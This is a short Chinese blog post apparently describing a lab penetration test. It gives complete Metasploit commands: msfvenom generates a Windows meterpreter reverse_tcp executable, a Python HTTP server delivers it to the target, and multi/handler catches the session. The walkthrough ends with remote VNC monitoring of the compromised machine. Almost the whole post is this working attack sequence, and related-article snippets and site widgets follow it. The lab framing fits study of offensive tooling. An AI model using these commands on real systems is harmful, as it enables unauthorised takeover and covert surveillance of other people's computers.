一次简单的渗透测试

最新推荐文章于 2023-04-10 17:45:26 发布
最新推荐文章于 2023-04-10 17:45:26 发布
阅读量297 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunkaijie123/article/details/128547899
版权

一、环境

kali2022.4,靶机环境win10物联网企业版,工具:msfvenom、msfconsole、python3

二、具体步骤

1、管理员权限打开终端

2、生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=指定端口 -f exe -o test.exe

3、在目标靶机下载生成的test.exe程序

1)在kali执行python3 -m http.server

2)在目标靶机进行下载

4、执行msfconsole命令

5、配置参数

use exploit/multi/handler(选择模块)

set payload windows/meterpreter/reverse_tcp(选择攻击模块)

set LhOST 本地ip

set lport 指定端口号

show options(查看配置的参数)

exploit -z -j(后台执行)

6、在靶机运行可执行程序test.exe

7、执行sessions查看上钩的用户

8、执行sessions -i 1进行攻击,出现meterpreter说明你就已经成功的入侵的对方的电脑

9、运行run vnc -i进行远程监控靶机

古道青阳
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
简单的练习渗透测试的方法(真的很简单
caption88的博客
12-01 1666
首先渗透测试就是传说的黑客选手。砸门现在开始教程(文中涉及很多下载链接,本人就是使用这个链接,所以我也不知道有没有中毒,不过既然要做这一行,砸门不是已经被黑就是在被黑的路上。所以没有关系啦) 第一步:虽然我们不能确定自己被没有被黑,或者我们安装的软件是否有毒的情况下,砸门先开一个保护的东西再说:比如360,或者电脑管家,或者知名公司旗下的产品。知名公司例如:知道创宇,360,绿盟等。我反正...
day09、1 - 简单渗透测试流程
Edimade的博客
05-08 1197
一、hacker的攻击基本流程(渗透测试流程)>二、渗透工具>三、渗透工具渗透原理>四、渗透攻击举例--IPC$>五、相关命令总结
第18节 简单渗透测试流程及实验
m0_64378913的博客
01-03 2344
本文章仅供教学研究使用,切莫在真实环境中试验。本节主要围绕网络渗透流程这一主题,从概述入手介绍扫描漏洞、暴力破解、445漏洞利用之IPC$、留后门等主要步骤,随后对每个步骤采用一个小实验进行讲解分析。
web调用exe_WEB安全渗透测试基础知识(八)
weixin_39848097的博客
12-12 225
3.5. 命令注入3.5.1. 简介命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。3.5.2. 常见危险函数3.5.2.1. PHPsystemexe...
一次曲折的渗透测试之旅1
08-03
在本文中,作者分享了一次具体的渗透测试经历,这是一次授权测试,即得到目标网站所有者的许可进行的测试。首先,进行了信息收集阶段,这是渗透测试的第一步。通过扫描子域名和端口,获取目标系统的基本信息。在这次...
一次不完整的渗透1
08-08
一次不完整的渗透测试 本文将详细介绍一次渗透测试的过程,从目标选择到最终的提权过程。该测试的目标是一个理工大学的网站,使用 phpCMS 3.0 版本搭建。 首先,对目标进行了大致的踩点,查看网站的外观和结构。...
法拉第:协同渗透测试和漏洞管理平台
02-05
关于 Faraday引入了一个新概念-IPE(集成渗透测试环境)多用户渗透... 您还记得上一次没有IDE进行编程的情况吗? IDE是编程的法拉第就是渗透测试。 要了解最新功能,请查看! 安装 有关所有受支持的操作系统的最新预
工控安全职业证书技能实践:渗透测试报告设计与编写.docx
07-09
此实验目的是加深渗透测试报告编写流程及内容的理解,并对一次模拟的渗透测试进行渗透测试报告编写。 实验目标 实现简单的系统渗透测试 实现简单的网站渗透测试 实现渗透测试报告编写 预备知识 熟悉渗透测试报告编写...
serverless_toolkit:进行渗透测试时使用的一组有用的无服务器功能
05-11
我发现自己不断地抛弃一次性VPS,以运行微小的代码片段或托管一些静态资源,而我厌倦了浪费资源并管理该基础结构以仅运行一个简单命令。 所有这些示例都是为了利用Zeit的。 虽然我使用了诸如AWS Lambda和Google ...
渗透测试指南——工具
热门推荐
weixin_43526443的博客
11-05 6万+
——D&X安全实验室 工欲善其事,必先利其器。回到过去的旧时代,渗透测试是一件非常困难的事,并且需要大量的手动操作。然而如今,渗透测试工具是"安全军火库"中最常使用的装备,一整套的自动化测试工具似乎不仅改造了渗透测试人员,甚至还可以增强计算机的性能,进行比以往更全面的测试。 对渗透测试人员来说不用任何自动化工具对网站或者应用程序进行渗透测试是一件十分困难的事。因此选择一个正确的工具则变得尤为重要,正确的选择甚至占去了渗透测试成功的半壁江山。本篇文章就来和大家介绍一...
电脑桌面app客户端、微信公众号-小程序测试方法
希望我的博客,能帮上你解决学习中工作中所遇到的问题
04-10 1207
电脑桌面app客户端、微信公众号-小程序测试方法
Metasploit(MSF)渗透测试入门
2301_77147728的博客
03-29 936
MSF所用功能主要可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程1、Auxiliary(辅助模块)为渗透测试信息搜集提供了大量的辅助模块支持2、Exploits(攻击模块)利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。3、Payload(攻击载荷模块)攻击成功后促使靶机运行的一段植入代码4、Post (后渗透攻击模块)收集更多信息或进一步访问被利用的目标系统5、Encoders(编码模块)
渗透测试常用方法总结
MzHeader的博客
06-19 1万+
1 渗透流程 信息收集 漏洞验证/漏洞攻击 提权,权限维持 日志清理 其他 1 信息收集 一般先运行端口扫描和漏洞扫描获取可以利用的漏洞。多利用搜索引擎 端口扫描 有授权的情况下直接使用 nmap 、msscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。 使用 Python 端口扫描的介绍 https://thief.one/2018/05/17/1...
靶机 Hacknos:1
m0_51811529的博客
08-30 438
靶机1
在Linux中使用Python启动http服务详细攻略
Linux I Tell U
09-15 7506
前言 当你需要内建一个简单的WEB页面,又不想配置apache或者Nginx,并把需要共享的目录或者文件都以HTTP的方式展示出来。Python自带http服务,并且使用起来也非常简单。 一般Linux系统都是自带的Python的,Windows下则需要先安装python,所以你可以不费吹灰之力,快速解决这个问题。 下面所做的操作都是在Ubuntu20.04的环境上实现的 Python2启动方式 python -m SimpleHTTPServer 服务启动,默认端口为 8000 Python3启动方式
01-【python】python开启HTTP服务
qq_42303254的博客
10-27 292
https://www.cnblogs.com/orange777/p/10783499.html
靶场练习第二十五天~vulnhub靶场之Raven-2
qq_57976347的博客
02-18 1019
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.128 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 访问靶机网站,
Kali下使用一行python代码实现简易的http服务器
汗的博客
04-30 3221
比如我在kali的tmp目录下执行下列代码,就可以在当前目录开启一个http服务 python -m SimpleHTTPServer 然后就可以从另一台机器访问kali的ip下/tmp目录的内容,这样就可以传输文件等操作, ...
一次完整的渗透测试流程
最新发布
05-23
一次完整的渗透测试流程通常分为以下几个步骤: 1. 阶段一:信息收集 这个阶段是为了获取目标系统的信息,包括IP地址、域名、网络拓扑结构、操作系统、服务、应用程序等等。渗透测试人员可以使用各种工具和技术,如端口扫描、WHOIS查询、DNS枚举、搜索引擎、社交工程等。 2. 阶段二:漏洞扫描与分析 在这个阶段,渗透测试人员会使用各种漏洞扫描工具对目标系统进行扫描,以识别潜在的漏洞和弱点。渗透测试人员还会对扫描结果进行分析和验证,以确定漏洞的可利用性和危害性。 3. 阶段三:攻击与渗透 在这个阶段,渗透测试人员会尝试利用已发现的漏洞和弱点,对目标系统进行攻击和渗透。这可能包括使用已知的攻击工具或编写自定义的攻击代码,以实现目标。 4. 阶段四:提权与维持访问 一旦成功渗透到目标系统,渗透测试人员会尝试提升其权限,以获取更高的访问级别和更敏感的信息。然后,他们会尝试维持对目标系统的访问,以便长期地进行监视和数据收集。 5. 阶段五:清理 在完成渗透测试之后,渗透测试人员会清理所有的痕迹和证据,以避免留下攻击痕迹和可能被发现的证据。这包括删除系统日志、恢复文件时间戳等。 6. 阶段六:报告 在完成渗透测试之后,渗透测试人员会生成一份详细的报告,列出所有发现的漏洞和弱点,以及建议的修补措施。此报告将提供给客户,以便他们能够采取必要的措施来保护其系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

古道青阳

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值